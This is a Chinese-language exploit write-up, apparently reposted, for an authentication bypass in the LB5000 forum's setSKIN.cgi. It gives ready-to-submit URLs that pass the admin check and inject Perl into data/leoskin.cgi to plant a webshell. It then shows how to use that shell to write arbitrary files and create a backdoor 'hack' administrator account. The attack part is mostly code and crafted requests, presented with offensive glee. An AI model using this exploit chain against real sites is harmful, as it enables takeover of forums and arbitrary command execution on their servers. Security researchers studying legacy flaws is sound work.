>>>Dedicated This Scrap To CaoJing<<<
涉及版本:
LB5000XP所有版本,低于LB5000MX1.90(1.90已修复)所有版本
描述:
LB是一款由www.leoboard.com开发和维护的源代码开放的cgi论坛;由于setSKIN.cgi存在管理员验证可绕开漏洞,可能导致非法用户控制论坛或以web权限在系统上执行任意命令
具体:
LB论坛管理菜单中有个“管理区插件设定“的特殊功能,我们来看看它是如何对管理员进行验证的:
----------------------------------------------
62 $inmembername = cookie("adminname");
63 $inpassWord = cookie("adminpass");
...
68 &getmember("$inmembername");
69
70 if (($membercode eq "ad") && ($inpassword eq $password) && (lc($inmembername) eq lc($membername))) {
...
----------------------------------------------
其中getmember()是提取用户资料的一个函数,如果$inmembername用户存在它将返回此用户的密码、等级等信息,但要是这个用户不存在呢?呵呵,这下可就坏了,我们还是先来看看getmember()函数的相关部分:
----------------------------------------------
sub getmember {
my $nametocheck = shift;
...
my $filetoopen = "$lbdir" . "$memdir/$nametocheck.cgi";
...
if ((-e $filetoopen)&&($nametocheck !~ /^客人/)) {#如果用户存在就提取
...#省略大量提取用户信息的代码
}
else { $userregistered = "no"; }#如果不存在,仅仅返回这个
}
----------------------------------------------
显然当我们直接请求setskin.cgi文件的时候$inmembername为空,也就是说&getmember("$inmembername")这行只会返回个$userregistered = "no";但setskin.cgi文件中$userregistered连影都没有,嘿嘿,问题出来了吧:&getmember("$inmembername")在setskin.cgi文件中“形同虚设“!!我们现在回过头看第70行的验证代码:
($inpassword eq $password)和(lc($inmembername) eq lc($membername))已经搞定了,因为它们都为空嘛;只有($membercode eq "ad")尚待搞定,要这是PHP程序你肯定会脱口而出我们直接指定“membercode=ad”啊!要命的是在这里你同样可以这样做,因为可爱的LB在setskin.cgi的开头有这么几行:
----------------------------------------------
@params = $query->param;
foreach (@params) {
$theparam = $query->param($_);
$theparam =~ s/\@/\\\@/g;
$theparam =~ s/\$/\\\$/g;
$theparam = &unHtml("$theparam");
${$_} = $theparam;
----------------------------------------------
哈哈,爽吧,还等什么,直接提交如下URL进入:
http://www.target.com/perl/lb5000mx/cgi-bin/setskin.cgi?membercode=ad
Yeah,成功!!
[1] [2] [3]
...恩,请小声点,并没有结束,相反,攻击才开始。
上面这个是次要的,我们做不了什么,但我们绕开了验证,接下来的代码才有味道呢!
----------------------------------------------
73 if ($action eq "process") {
74
75
76 $printme .= "1\;\n";
77
78 $filetomake = "$lbdir" . "data/leoskin.cgi";
79
80 open(FILE,">$filetomake");
81 flock(FILE,2) if ($OS_USED eq "Unix");
82 print FILE "$printme";
83 close(FILE);
----------------------------------------------
同样,这里的$printme也是我们手中控制的变量,可向data/leoskin.cgi覆盖式的写入东西,太好了,可写什么呢?要知道写这次会覆盖上一次写的,它可没耐心让你一行一行,而且,它还处理了一批有用字符:
----------------------------------------------
52 $theparam =~ s/\@/\\\@/g;
53 $theparam =~ s/\$/\\\$/g;
54 $theparam = &unHTML("$theparam");
...
sub unHTML {
my $text = shift;
$text =~ s/<!--(.|\n)*-->//g;
$text =~ s/\&/\&/g;
$text =~ s/<s cript>/\<s cript\>/ig;
$text =~ s/"/\"/g;
$text =~ s/ / \ /g;
$text =~ s/</\</g;
$text =~ s/>/\>/g;
$text =~ s/[\a\f\e\0\r\t]//isg;
$text =~ s/document.cookie/documents\&\#46\;cookie/isg;
return $text;
}
----------------------------------------------
My God,@&$”<>全军覆没,看来要动真格了,好,提交下面URL:
http://www.target.com/perl/lb5000mx/cgi-bin/setskin.cgi?membercode=ad&action=process&printme=use%20CGI%20qw(:standard)%3bopen(SKY,param('a'))%3bprint%20SKY%20param('b')%3b
文件data/leoskin.cgi现在变成什么样了呢?
----------------------------------------------
use CGI qw(:standard);open(SKY,param('a'));print SKY param('b');$printme = "use CGI qw(:standard);open(SKY,param('a'));print SKY param('b');";
1;
----------------------------------------------
实质起作用的是:
----------------------------------------------
use CGI qw(:standard);
open(SKY,param('a'));
print SKY param('b');
----------------------------------------------
这个小webshell酷吧,它能做许多事哦,比如说:
http://www.psych.com/perl/lb5000mx/cgi-bin/data/leoskin.cgi?a=>;>E:/PsYch/PERL/LB5000MX/cgi-bin/data/hack.cgi&b=hahahaha
这样你就在E:/PsYch/PERL/LB5000MX/cgi-bin/data/目录下新写入了一个文件hack.cgi其内容为”hahahaha”;照同样的方法把下面这个文件一行一行(我没强迫你这样做,你可以写个小程序)写到对方web下一个目录:
----------------------------------------------
$lbpath="E:/PsYch/PERL/LB5000MX/cgi-bin/";####注意:此处请修改####
$ad="/hack.cgi";
opendir(DIR,"$lbpath");
@files=readdir(DIR);
close(DIR);
@memdir=grep(/^members/,@files);
$hack=$lbpath.@memdir[0].$ad;
open(HACK,">$hack");
print HACK "hack\thack\thack\tad\n";
----------------------------------------------
假使你把文件名定为 love.cgi,在/somepath目录下,提交
http://www.target.com/somepath/love.cgi
哦,一个hack/hack管理员诞生了!
[1] [2] [3]
当然,上传个功能强使用方便的webshell上去也行,不过那是你自己的工作了!
(出处:http://www.sheup.com)
[1] [2] [3]